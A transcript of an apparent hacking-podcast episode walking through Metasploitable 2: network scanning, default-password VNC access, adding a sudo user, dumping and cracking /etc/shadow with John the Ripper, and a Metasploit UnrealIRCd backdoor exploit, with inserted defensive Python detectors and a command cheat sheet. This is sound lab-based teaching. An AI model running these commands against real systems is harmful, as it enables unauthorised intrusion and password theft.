In this first real episode we take a look at Metasploitable!
Hello and welcome to episode 1 of the Sudo Social Club. I’m Edward Miro and in this episode I am going to be taking a look at Metasploitable 2.
The Sudo Social Club is a podcast and YouTube channel centered around hacking capture-the-flags, wargames, crypto challenges and vulnerable VMs. I will be recording videos of me completing the challenges and also explaining in detail what I’m doing, why I’m doing it, and as much information as I can fit into each episode. Each week I’ll be picking a vulnerable VM, challenge or CTF to work through with you, and together we will learn about all the techniques, protocols and workflows to hack all the things. I’m also going to maintain a really good reference page on www.sudosocialclub.com with links, a workflow cheatsheet with all the commands I used, and a feed of all my past episodes for you to use anytime you need it.
If anyone has any feedback or recommendations on how I can improve the channel please leave a comment or email me at firstname.lastname@example.org. Stay tuned after the main content for the Sudo Social Club crypto challenge of the week for a chance to get invited to our private Discord server!
Thanks for tuning in, now let’s begin:
So for this week’s episode I thought we should start with the VM that, at least to my knowledge, started this whole intentionally vulnerable VM thing: Metasploitable 2. From the research I did, the original Metasploitable was released back in 2010. The one we’re looking at today is version 2, which was released in 2012, and there is a version 3 that came out in 2016. I picked v2 because that’s the version linked on the Metasploit Unleashed Requirements page.
Like most vulnerable VMs, it’s always best to set them to run in host-only or NAT mode to keep them segregated from the rest of your network, so I went in here to the VirtualBox Host Network Manager and created a virtual adapter that I named NatAdapter. You can’t see it here, but if I show the settings on each of my running VMs you can see that I selected NAT and then selected my virtual adapter.
Now I know the default login and password for Metasploitable 2, so I could just log in here and run:
and get the IP address, but that wouldn’t be any fun, so instead let’s pop back over here to the Kali VM and try some scans. Before that, as always, we will run:
clear
apt-get update
apt-get upgrade
apt-get autoremove
Then we will run:
ifconfig
to get our network information. I’m also gonna put this notepad over here to take notes as we go. We know our Kali machine is sitting at 192.168.56.101, so we’ll assume our target will be somewhere in the 192.168.56.0/24 block.
Lately I’ve been in the habit of running:
netdiscover -r 192.168.56.0/24
before anything else to see what’s on the network. Netdiscover sends out ARP (Address Resolution Protocol) requests. ARP works a lot like DNS, but where DNS resolves domain names to IP addresses on the internet, ARP resolves IP addresses to MAC addresses on the local network. Hosts, routers and switches keep ARP tables of the devices they have seen.
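The same ARP table that Netdiscover fills in from the attacker’s side is what a defender checks from the other side. The following is an added example, not code from the episode or from Netdiscover: it parses neighbour-table output in the format of `ip -4 neigh show` (the sample lines and the `KNOWN_HOSTS` inventory are constructed for this example) and reports hosts whose MAC is not in the inventory, plus any MAC that answers for more than one IP.

```python
import re
from collections import defaultdict

# Constructed output in the format of `ip -4 neigh show` (not a real capture).
# 192.168.56.103 carries a MAC that is not in the inventory, and 192.168.56.104
# claims the same MAC as the Metasploitable VM.
NEIGH_SAMPLE = """\
192.168.56.1 dev eth0 lladdr 0a:00:27:00:00:00 REACHABLE
192.168.56.101 dev eth0 lladdr 08:00:27:3f:a1:9c STALE
192.168.56.102 dev eth0 lladdr 08:00:27:7e:44:1d REACHABLE
192.168.56.103 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.56.104 dev eth0 lladdr 08:00:27:7e:44:1d STALE
192.168.56.150 dev eth0 FAILED
"""

# Hypothetical inventory: MAC address -> host name for every VM expected on the lab segment.
KNOWN_HOSTS = {
    "0a:00:27:00:00:00": "virtualbox-host",
    "08:00:27:3f:a1:9c": "kali",
    "08:00:27:7e:44:1d": "metasploitable2",
}

NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) dev (?P<dev>\S+)"
    r"(?: lladdr (?P<mac>[0-9a-f]{2}(?::[0-9a-f]{2}){5}))? (?P<state>\S+)$"
)


def parse_neigh(text):
    """Parse neighbour-table lines into dicts; FAILED/INCOMPLETE entries have no MAC (mac=None)."""
    entries = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            entries.append(m.groupdict())
    return entries


def audit_neighbours(text, known):
    """Flag MACs missing from the inventory and MACs that answer for more than one IP.

    Returns a list of tuples:
      ("unknown-host", ip, mac)       -> a device nobody added to the inventory
      ("shared-mac", mac, (ip, ...))  -> one interface answering for several IPs, which is
                                         what ARP spoofing (or a cloned VM) looks like
    """
    findings = []
    ips_by_mac = defaultdict(list)
    for entry in parse_neigh(text):
        if entry["mac"] is None:
            continue
        ips_by_mac[entry["mac"]].append(entry["ip"])
        if entry["mac"] not in known:
            findings.append(("unknown-host", entry["ip"], entry["mac"]))
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            findings.append(("shared-mac", mac, tuple(ips)))
    return findings


if __name__ == "__main__":
    for finding in audit_neighbours(NEIGH_SAMPLE, KNOWN_HOSTS):
        print(*finding)
```

On a real box you would feed it the live table (`ip -4 neigh show`) and keep the inventory in a file; a shared MAC is not always hostile (VirtualBox NAT and IP aliases produce it too), so treat it as a review item rather than an alert.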
So here we can see that we have a host at 192.168.56.102, so we will note that here, but I’m also gonna show how a basic host discovery scan works in Nmap. If we run:
nmap -sn 192.168.56.0/24
The -sn option tells Nmap to skip the port scan and only do host discovery: it sends out probes and sees what answers (on a directly attached subnet like this one, Nmap run as root uses ARP requests for that, which is why it shows exactly what Netdiscover did). For our purposes today we don’t need to get any deeper into Nmap’s host discovery methods. We’ve got our target and now we need to check what’s running on it. We’ll try the popular TCP SYN scan by running:
nmap -sS 192.168.56.102
and that gives us a Christmas tree of services: open ports that are responding to our scan.
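From the target’s side, a SYN scan is one source address knocking on many different ports in a short time, and that pattern is easy to spot in firewall logs. The following is an added example, not code from the episode: it runs a sliding-window detector over lines in the format of iptables `LOG` output (the sample lines are constructed for this example; the threshold and window are assumptions you would tune) and reports sources that reach too many distinct destination ports inside one window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the style of iptables LOG output (not real captures).
# 192.168.56.101 hits twelve different ports in two seconds, which is what a SYN
# scan looks like from the target's side; 192.168.56.1 only ever talks to port 80.
_LINE = ("Jan 10 12:00:{sec:02d} target kernel: IN=eth0 OUT= SRC={src} DST=192.168.56.102 "
         "PROTO=TCP SPT={sport} DPT={dport} WINDOW=1024 RES=0x00 SYN URGP=0")
_lines = [_LINE.format(sec=1 + i // 6, src="192.168.56.101", sport=40000 + i, dport=p)
          for i, p in enumerate([21, 22, 23, 25, 53, 80, 111, 139, 445, 512, 513, 514])]
_lines += [_LINE.format(sec=5, src="192.168.56.1", sport=51000, dport=80),
           _LINE.format(sec=9, src="192.168.56.1", sport=51001, dport=80)]
SAMPLE_LOG = "\n".join(_lines)

SYN_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) .*?SRC=(?P<src>\S+) DST=\S+ "
    r"PROTO=TCP SPT=\d+ DPT=(?P<dport>\d+) .*\bSYN\b"
)


def parse_syn_events(log_text):
    """Return (timestamp, src, dport) for every logged inbound TCP SYN.

    Lines carrying ACK are SYN/ACK replies, not connection attempts, and are skipped.
    """
    events = []
    for line in log_text.splitlines():
        m = SYN_RE.match(line)
        if not m or " ACK " in line:
            continue
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # syslog stamps carry no year
        events.append((ts, m.group("src"), int(m.group("dport"))))
    return events


def detect_syn_scans(log_text, threshold=10, window_seconds=60):
    """Map each source to the most distinct destination ports it hit inside one window,
    keeping only sources that reach `threshold`. A client talking to one or two services
    never gets near that; a default nmap -sS run touches about 1000 ports."""
    by_src = defaultdict(list)
    for ts, src, dport in parse_syn_events(log_text):
        by_src[src].append((ts, dport))
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for src, events in by_src.items():
        events.sort()
        best = 0
        for i, (start, _) in enumerate(events):
            in_window = {port for ts, port in events[i:] if ts - start <= window}
            best = max(best, len(in_window))
        if best >= threshold:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    for src, ports in detect_syn_scans(SAMPLE_LOG).items():
        print(f"{src}: {ports} distinct ports inside 60 s, looks like a port scan")
```

A rule such as `iptables -A INPUT -p tcp --syn -j LOG --log-prefix "SYN: "` produces lines in this format; the detector only counts distinct ports, so a slow scan spread over hours needs a longer window to show up.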
When I started running through what I was gonna do for this episode I found that Metasploitable 2 is so vulnerable, as you can see here, that I kind of had choice paralysis about which exploits or techniques to show. If we tried to demo them all this video would be hours long, so instead I chose to cherry-pick just a few things to give a good introduction.
The first service that caught my eye was 5900/tcp open vnc. I used VNC a lot at one of my former jobs working at a managed services provider. If you aren’t familiar with what MSPs do, the one I worked at had clients that were small to medium companies that didn’t have a full-time IT guy, so they’d contract with us and we’d take care of all their IT/server administration remotely using RDP, VNC and other remote desktop tools. We connect with:
xtightvncviewer 192.168.56.102:5900
and when prompted for the password, I’m gonna take a shot in the dark and try “password”. And we’re in. I can see from the shell that popped up on this desktop that I’m logged in as root. This is very useful. I’m gonna go ahead and set us up with our own root-level user so we can do whatever else we want. I’m running:
sudo adduser <username>
sudo adduser <username> sudo
sudo adduser <username> admin
Cool. So now let’s exit VNC and log in to the target via SSH by running:
I’ll also run:
groups
to make sure I’m good with the permissions I set up earlier while we were on VNC. Looks like we’re good to go, so I think next it might be fun to crack the passwd and shadow files with John the Ripper.
The passwd file stores user names, user identifier numbers (UID), group identifier numbers (GID), paths to home directories, login shells and so on. The shadow file is where the users’ password hashes are stored, and unlike passwd it is only readable by root. We can cat each of these files:
cat /etc/passwd
remembering to use sudo cat for the shadow file:
sudo cat /etc/shadow
Save each of them on our machine as the files passwd and shadow and use:
unshadow passwd shadow > loot
to combine them into a single file matching usernames to hashes. Then we can use John the Ripper to crack the hashes by running:
john loot
and print the passwords it recovered with:
john --show loot
(--show only displays hashes John has already cracked into its pot file, so it needs the cracking run first.)
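What unshadow does is a plain join of the two files on the username, and the same parsing lets a defender audit the files before anyone runs John over them. The following is an added example, not code from the episode or from John the Ripper: it merges constructed /etc/passwd and /etc/shadow entries (placeholder hashes in the right formats, not copied from any host) the way unshadow does, names the hash scheme behind each shadow entry, and reports the conditions that make a shadow file cheap to crack: empty passwords, extra UID 0 accounts, and fast hash schemes such as DES crypt and md5crypt.

```python
import re

# Constructed /etc/passwd and /etc/shadow entries (not copied from any real host);
# the hashes are placeholder strings in the right formats.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
backup:x:34:34:backup:/var/backups:/bin/sh
toor:x:0:0:second root:/root:/bin/bash
guest:x:1001:1001:guest:/home/guest:/bin/bash
"""

SHADOW_SAMPLE = """\
root:$1$abcdefgh$ZZZZZZZZZZZZZZZZZZZZZZ:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
msfadmin:$6$saltsalt$HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH:14747:0:99999:7:::
backup:!:14684:0:99999:7:::
toor:AbCdEfGhIjKlM:14747:0:99999:7:::
guest::14747:0:99999:7:::
"""

CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
WEAK_HASHES = {"md5crypt", "descrypt"}  # cheap-to-compute schemes John works through quickly


def parse_colon_file(text, min_fields):
    """Parse passwd/shadow style lines into {username: fields}; both files are ':'-separated."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < min_fields:
            raise ValueError(f"malformed entry: {line!r}")
        entries[fields[0]] = fields
    return entries


def unshadow(passwd_text, shadow_text):
    """Copy each user's hash from shadow into the passwd password field, as unshadow(8) does."""
    passwd = parse_colon_file(passwd_text, 7)
    shadow = parse_colon_file(shadow_text, 2)
    merged = []
    for user, fields in passwd.items():
        fields = fields[:]
        if user in shadow:
            fields[1] = shadow[user][1]
        merged.append(":".join(fields))
    return "\n".join(merged)


def classify_hash(field):
    """Name the scheme behind a shadow password field."""
    if field == "":
        return "empty"
    if field.startswith(("!", "*")):
        return "locked"
    m = re.match(r"^\$([A-Za-z0-9]+)\$", field)
    if m:
        return CRYPT_IDS.get(m.group(1), "unknown")
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "descrypt"  # traditional DES crypt: 2-char salt + 11 chars, no '$' prefix
    return "unknown"


def audit_accounts(passwd_text, shadow_text):
    """Return (user, finding) pairs for the conditions that make a cracked shadow file cheap."""
    findings = []
    passwd = parse_colon_file(passwd_text, 7)
    shadow = parse_colon_file(shadow_text, 2)
    for user, fields in passwd.items():
        if int(fields[2]) == 0 and user != "root":
            findings.append((user, "uid 0 account other than root"))
        if fields[1] != "x":
            findings.append((user, "hash kept in world-readable /etc/passwd"))
        kind = classify_hash(shadow[user][1]) if user in shadow else "missing"
        if kind == "empty":
            findings.append((user, "empty password"))
        elif kind == "missing":
            findings.append((user, "no shadow entry"))
        elif kind in WEAK_HASHES:
            findings.append((user, f"weak hash scheme: {kind}"))
    return findings


if __name__ == "__main__":
    print(unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE))
    for user, finding in audit_accounts(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(f"{user}: {finding}")
```

The scheme prefix is the part worth reading: `$6$` (sha512crypt) or `$y$` (yescrypt) entries cost John thousands of times more per guess than the md5crypt and DES entries that let an old image fall over in seconds.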
Well that was easy. So now we have way more information than we need, but we’re gonna end this session today by showing how to use a Metasploit exploit to get a shell by exploiting a backdoor in the UnrealIRCd IRC daemon. As we can see we have irc running on port 6667, and if you Google “irc 6667 exploit” the first result is this CVE-2010-2075 write-up on Rapid7: UnrealIRCd 3.2.8.1 Backdoor Command Execution.
It even gives us a handy little workflow of commands at the bottom. We start Metasploit by running:
msfconsole
Then once Metasploit is running we enter:
use exploit/unix/irc/unreal_ircd_3281_backdoor
We then define the target IP address by entering:
set RHOST 192.168.56.102
Then we launch the exploit by typing:
exploit
It’s that simple. If I enter:
We see that we are root and have a reverse shell into our target machine. It’s really that easy folks.
Well, I’m gonna go ahead and end today’s episode here. I think we’ve covered a fair amount of the basics needed to get started. In the future it won’t be quite as easy as Metasploitable 2 has made it for us, but this was just an introduction and a way to test our tools and make sure our attack platform is working as intended.
If you check out the show notes at sudosocialclub.com I have this complete transcript including a bit at the end with just a list of the commands as an easy cheat sheet for anyone trying this at home.
apt-get update
apt-get upgrade
apt-get autoremove
ifconfig
netdiscover -r 192.168.56.0/24
nmap -sn 192.168.56.0/24
nmap -sS 192.168.56.102
xtightvncviewer 192.168.56.102:5900
sudo adduser ssc
sudo adduser ssc sudo
sudo adduser ssc admin
ssh email@example.com
groups
cat /etc/passwd
sudo cat /etc/shadow
unshadow passwd shadow > loot
john loot
john --show loot
msfconsole
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST 192.168.56.102
exploit
Now onto this week’s crypto challenge! If you want to attempt this week’s challenge, go to www.sudosocialclub.com, click on this week’s episode and scroll to the bottom for the cipher text. If you think you solved it, send me an email at firstname.lastname@example.org and I’ll invite you to join our Discord server so you can chat with me and other listeners like yourself.
65 73 6a 6f 6c 20 62 6d 6d 20 75 69 66 20 63 70 70 61 66 20 69 62 64 6c 20 62 6d 6d 20 75 69 66 20 75 69 6a 6f 68 74
If you like this week’s episode and want to help support this channel, please subscribe to the podcast through whatever podcatcher you found me through, and please subscribe to the YouTube channel. Links to everything are on www.sudosocialclub.com, including transcripts, and if you want to help the channel grow please share on your social media. Once again, I’m Edward Miro and you can contact me at email@example.com with any comments, questions, corrections or feedback, including ideas for future episodes. Thanks for checking out the Sudo Social Club. Have a great week!